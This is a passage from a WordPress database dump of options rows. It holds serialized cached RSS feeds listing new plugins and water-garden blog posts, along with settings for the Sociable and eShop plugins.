platform.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Radish Concepts\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:10;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Meteora Pixels\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:63:\"https://wordpress.org/plugins/meteora-pixel-manager/#post-77487\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 04 Feb 2015 16:17:22 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"77487@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"Easily install and manage your Meteora Pixel code.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"missionmeteora\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:11;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"Offers for WooCommerce\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"https://wordpress.org/plugins/offers-for-woocommerce/#post-77527\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 05 Feb 2015 11:05:48 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"77527@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"Adds the power of negotiation to your WooCommerce store.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"angelleye\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:12;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"BMI Widget\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"https://wordpress.org/plugins/bmi-widget/#post-77546\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 05 Feb 2015 20:14:46 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"77546@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:106:\"Adds a widget that displays a BMI calculator with standard or metric measurements and options for styling.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"swaincreates\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:13;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Easy SwipeBox\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"https://wordpress.org/plugins/easy-swipebox/#post-76653\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 15 Jan 2015 23:52:10 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"76653@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:94:\"This plugin enable SwipeBox jQuery extension to all links to image or Video (Youtube / Vimeo).\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Leonardo Giacone\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:14;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Contact Form 7 GPG\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"https://wordpress.org/plugins/contact-form-7-gpg/#post-77485\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 04 Feb 2015 15:25:10 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"77485@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:100:\"Encrypt all your messages send with Contact Form 7 using a pure PHP port of GNU Privacy Guard (GPG).\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:3:\"lpl\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}s:27:\"http://www.w3.org/2005/Atom\";a:1:{s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:4:\"href\";s:42:\"https://wordpress.org/plugins/rss/view/new\";s:3:\"rel\";s:4:\"self\";s:4:\"type\";s:19:\"application/rss+xml\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";a:8:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Mon, 09 Feb 2015 22:26:16 GMT\";s:12:\"content-type\";s:23:\"text/xml; charset=UTF-8\";s:10:\"connection\";s:5:\"close\";s:4:\"vary\";s:15:\"Accept-Encoding\";s:13:\"last-modified\";s:29:\"Tue, 27 Jan 2015 14:55:44 GMT\";s:15:\"x-frame-options\";s:10:\"SAMEORIGIN\";s:4:\"x-nc\";s:11:\"HIT lax 249\";}s:5:\"build\";s:14:\"20130522182132\";}','no'),(616,'sociable_options','a:13:{s:7:\"version\";s:5:\"4.3.2\";s:13:\"blogplay_tags\";s:1:\"1\";s:7:\"tagline\";s:19:\"Be Sociable, Share!\";s:12:\"active_sites\";a:16:{s:7:\"Twitter\";s:2:\"on\";s:8:\"Facebook\";s:2:\"on\";s:5:\"email\";s:2:\"on\";s:6:\"vuible\";s:2:\"on\";s:16:\"Add to favorites\";s:2:\"on\";s:11:\"StumbleUpon\";s:2:\"on\";s:9:\"Delicious\";s:2:\"on\";s:13:\"Google Reader\";s:2:\"on\";s:8:\"LinkedIn\";s:2:\"on\";s:4:\"More\";s:2:\"on\";s:15:\"Twitter Counter\";s:2:\"on\";s:16:\"Facebook Counter\";s:2:\"on\";s:8:\"Google +\";s:2:\"on\";s:16:\"LinkedIn Counter\";s:2:\"on\";s:19:\"StumbleUpon Counter\";s:2:\"on\";s:14:\"vuible Counter\";s:2:\"on\";}s:9:\"icon_size\";s:2:\"32\";s:11:\"icon_option\";s:7:\"option1\";s:9:\"locations\";a:2:{s:9:\"is_single\";s:2:\"on\";s:7:\"is_page\";s:2:\"on\";}s:14:\"automatic_mode\";s:2:\"on\";s:14:\"use_stylesheet\";s:2:\"on\";s:10:\"use_images\";s:2:\"on\";s:13:\"use_alphamask\";s:2:\"on\";s:10:\"new_window\";s:2:\"on\";s:6:\"active\";s:2:\"on\";}','yes'),(617,'sociable_helpus','1','yes'),(528,'widget_eshopwi_cart','a:2:{i:2;a:11:{s:5:\"title\";s:0:\"\";s:4:\"show\";s:3:\"yes\";s:8:\"showwhat\";s:4:\"full\";s:5:\"total\";s:0:\"\";s:5:\"items\";s:0:\"\";s:3:\"qty\";s:0:\"\";s:2:\"fc\";s:1:\"2\";s:5:\"fcimg\";s:0:\"\";s:4:\"text\";s:18:\"Your cart is empty\";s:10:\"dw_include\";i:0;s:9:\"other_ids\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(695,'_site_transient_timeout_top_aio_favicon','1372532713','yes'),(696,'_site_transient_top_aio_favicon','s:4:\"b:0;\";','yes'),(697,'_site_transient_timeout_latest_aio_favicon','1372532714','yes'),(698,'_site_transient_latest_aio_favicon','s:4:\"b:0;\";','yes'),(711,'_site_transient_browser_f76e1da45697f2bea834d3cc529b10fb','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:7:\"Firefox\";s:7:\"version\";s:6:\"15.0.1\";s:10:\"update_url\";s:23:\"http://www.firefox.com/\";s:7:\"img_src\";s:50:\"http://s.wordpress.org/images/browsers/firefox.png\";s:11:\"img_src_ssl\";s:49:\"https://wordpress.org/images/browsers/firefox.png\";s:15:\"current_version\";s:2:\"16\";s:7:\"upgrade\";b:1;s:8:\"insecure\";b:0;}','yes'),(522,'eshop_plugin_settings','a:94:{s:15:\"addtocart_image\";s:3:\"img\";s:10:\"base_brand\";s:0:\"\";s:14:\"base_condition\";s:0:\"\";s:11:\"base_expiry\";s:0:\"\";s:12:\"base_payment\";s:0:\"\";s:10:\"base_ptype\";s:0:\"\";s:8:\"business\";s:0:\"\";s:4:\"cart\";i:84;s:11:\"cart_cancel\";i:88;s:12:\"cart_nostock\";s:12:\"Out of Stock\";s:13:\"cart_shipping\";i:89;s:12:\"cart_success\";i:87;s:8:\"checkout\";i:86;s:7:\"credits\";s:2:\"no\";s:10:\"cron_email\";s:0:\"\";s:15:\"currency_symbol\";s:1:\"$\";s:8:\"currency\";s:3:\"USD\";s:17:\"discount_shipping\";s:0:\"\";s:15:\"discount_spend1\";s:0:\"\";s:15:\"discount_value1\";s:0:\"\";s:15:\"discount_spend2\";s:0:\"\";s:15:\"discount_value2\";s:0:\"\";s:15:\"discount_spend3\";s:0:\"\";s:15:\"discount_value3\";s:0:\"\";s:17:\"downloads_hideall\";s:2:\"no\";s:13:\"downloads_num\";s:1:\"3\";s:14:\"downloads_only\";s:2:\"no\";s:4:\"etax\";a:1:{i:0;s:0:\"\";}s:10:\"first_time\";s:2:\"no\";s:9:\"fold_menu\";s:2:\"no\";s:10:\"from_email\";s:0:\"\";s:12:\"hide_addinfo\";s:3:\"yes\";s:11:\"hide_cartco\";s:2:\"no\";s:13:\"hide_shipping\";s:0:\"\";s:13:\"image_in_cart\";s:0:\"\";s:8:\"location\";s:2:\"US\";s:6:\"method\";a:1:{i:0;s:6:\"paypal\";}s:11:\"options_num\";s:1:\"3\";s:14:\"paypal_noemail\";s:3:\"yes\";s:7:\"records\";s:2:\"10\";s:10:\"search_img\";s:2:\"no\";s:16:\"set_cacheability\";s:2:\"no\";s:14:\"shipping_state\";s:2:\"GB\";s:13:\"shipping_zone\";s:7:\"country\";s:8:\"shipping\";s:1:\"4\";s:14:\"numb_shipzones\";s:1:\"5\";s:9:\"shop_page\";s:0:\"\";s:14:\"show_allstates\";s:0:\"\";s:14:\"show_downloads\";i:91;s:10:\"show_forms\";s:2:\"no\";s:10:\"show_zones\";s:2:\"no\";s:6:\"status\";s:7:\"testing\";s:13:\"stock_control\";s:2:\"no\";s:5:\"style\";s:3:\"yes\";s:9:\"sysemails\";s:0:\"\";s:5:\"tandc\";s:0:\"\";s:8:\"tandc_id\";s:0:\"\";s:9:\"tandc_use\";s:0:\"\";s:13:\"unknown_state\";s:1:\"5\";s:7:\"version\";s:6:\"6.3.10\";s:14:\"state_location\";s:0:\"\";s:10:\"tax_symbol\";s:3:\"VAT\";s:4:\"tax1\";s:1:\"0\";s:4:\"tax2\";s:1:\"0\";s:4:\"tax3\";s:1:\"0\";s:10:\"tax_method\";s:1:\"1\";s:9:\"xtra_help\";s:0:\"\";s:12:\"xtra_privacy\";s:0:\"\";s:4:\"sale\";s:2:\"no\";s:7:\"min_qty\";s:1:\"1\";s:7:\"max_qty\";s:3:\"100\";s:9:\"cart_text\";s:0:\"\";s:15:\"cart_text_where\";s:1:\"1\";s:11:\"sale_prices\";s:1:\"0\";s:5:\"users\";s:0:\"\";s:10:\"users_text\";s:0:\"\";s:4:\"zero\";s:1:\"0\";s:7:\"details\";a:4:{s:4:\"show\";s:0:\"\";s:5:\"class\";s:0:\"\";s:4:\"hide\";s:0:\"\";s:7:\"display\";s:3:\"yes\";}s:9:\"ajax_cart\";s:3:\"yes\";s:12:\"business_sec\";s:0:\"\";s:6:\"payson\";a:5:{s:5:\"email\";s:0:\"\";s:2:\"id\";s:0:\"\";s:3:\"key\";s:0:\"\";s:11:\"description\";s:0:\"\";s:7:\"minimum\";s:1:\"1\";}s:9:\"ideallite\";a:7:{s:13:\"IDEAL_AQUIRER\";s:0:\"\";s:14:\"IDEAL_HASH_KEY\";s:0:\"\";s:17:\"IDEAL_MERCHANT_ID\";s:0:\"\";s:12:\"IDEAL_SUB_ID\";s:0:\"\";s:15:\"IDEAL_TEST_MODE\";s:0:\"\";s:14:\"idealownermail\";s:0:\"\";s:16:\"idealdescription\";s:0:\"\";}s:12:\"authorizenet\";a:6:{s:9:\"developer\";s:1:\"0\";s:5:\"email\";s:0:\"\";s:2:\"id\";s:0:\"\";s:3:\"key\";s:0:\"\";s:6:\"secret\";s:0:\"\";s:4:\"desc\";s:0:\"\";}s:3:\"epn\";a:3:{s:5:\"email\";s:0:\"\";s:2:\"id\";s:0:\"\";s:11:\"description\";s:0:\"\";}s:4:\"cash\";a:2:{s:5:\"email\";s:0:\"\";s:6:\"rename\";s:0:\"\";}s:4:\"bank\";a:2:{s:5:\"email\";s:0:\"\";s:6:\"rename\";s:0:\"\";}s:8:\"webtopay\";a:5:{s:2:\"id\";s:0:\"\";s:4:\"lang\";s:0:\"\";s:9:\"signature\";s:0:\"\";s:9:\"projectid\";s:0:\"\";s:5:\"email\";s:0:\"\";}s:5:\"ogone\";a:4:{s:5:\"PSPID\";s:0:\"\";s:3:\"COM\";s:0:\"\";s:6:\"secret\";s:0:\"\";s:5:\"email\";s:0:\"\";}s:10:\"ship_types\";s:0:\"\";s:11:\"weight_unit\";s:2:\"lb\";s:25:\"shipping_country_selected\";s:0:\"\";s:23:\"shipping_state_selected\";s:0:\"\";s:16:\"widget_cart_type\";s:1:\"2\";s:15:\"widget_cart_img\";s:0:\"\";}','yes'),(706,'_transient_timeout_feed_mod_4334b75c8fdb0b38c4b7b5b5001b4896','1423210464','no'),(707,'_transient_feed_mod_4334b75c8fdb0b38c4b7b5b5001b4896','1423167264','no'),(704,'_transient_timeout_feed_4334b75c8fdb0b38c4b7b5b5001b4896','1423210464','no'),(705,'_transient_feed_4334b75c8fdb0b38c4b7b5b5001b4896','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:6:\"\n \n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:185:\"\n \n \n \n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:27:\"http://www.w3.org/2005/Atom\";a:1:{s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:4:\"href\";s:50:\"http://www.water-garden-guide.com/Water-Garden.xml\";s:3:\"rel\";s:4:\"self\";s:4:\"type\";s:19:\"application/rss+xml\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:0:\"\";a:9:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"The Water Garden Blog\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"http://www.water-garden-guide.com/Water-Garden-blog.html\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:129:\"The Water Garden Blog keeps you up-to-date with all additions and changes to the water-garden-guide.com Web site. Subscribe here.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"en-us\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Water garden\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 17 Aug 2012 01:24:56 -0400\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:13:\"lastBuildDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 17 Aug 2012 01:24:56 -0400\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"copyright\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"water-garden-guide.com\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:10:{i:0;a:6:{s:4:\"data\";s:48:\"\n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"Container Water Garden\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"http://www.water-garden-guide.com/container-water-garden.html\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"54178eeedc0c8d2f35910b3c05e945d6\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:132:\"A container water garden is a great choice for small spaces. They can be installed in a very short time and in a variety of styles. \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 17 Aug 2012 01:24:55 -0400\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:48:\"\n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"Contact Water Garden Guide\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"http://www.water-garden-guide.com/water-garden-contact.html\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"1d52fb90ee9211fd9c14d6bc1d84bccf\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:117:\"Do you have a water garden question? Would you like to share your story about building you own pond? Contact Us here.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 17 Aug 2012 01:23:16 -0400\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:48:\"\n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:42:\"A Garden Pond Bridge For Your Water Garden\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"http://www.water-garden-guide.com/garden-pond-bridge.html\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"79c8980393c2b0edd49e358311e1ebc7\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:114:\"Integrating a garden pond bridge into your backyard water garden. Design ideas and tips for bridging garden water.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 17 Aug 2012 01:07:20 -0400\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:48:\"\n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:17:\"Water Garden 